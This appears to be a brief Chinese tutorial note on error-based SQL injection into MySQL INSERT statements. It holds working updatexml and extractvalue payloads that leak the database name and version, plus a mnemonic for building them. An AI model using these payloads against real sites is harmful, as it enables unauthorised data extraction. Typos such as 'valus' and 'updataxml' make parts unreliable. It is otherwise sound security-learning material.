insert 注入

insert 注入
如何向数据库插入数据？

原始Mysql插入语句:
insert into member(username,pw,sex,phonenum,address,email) valus('user01',123456,1,2,3,4);

payload:
user01' or updatexml(1,concat(0x7e,(database())),0 ) or'

记忆法：

'or or'
updataxml(1,,0)
concat(0x7e,,0x7e)
(version())

拼接进去：
insert into member(username,pw,sex,phonenum,address,email) valus('user01' or updatexml(1,concat(0x7e,database()),0 ) or'',123456,1,2,3,4);

updatexml语句用来更新xml数据，第一个参数应该传入更新的数据，但是我们却传入了非法的参数，导致
报错执行database（）函数

extractvalue

'or extractvalue（1,concat（0x7e，(version（）)，0x7e））or'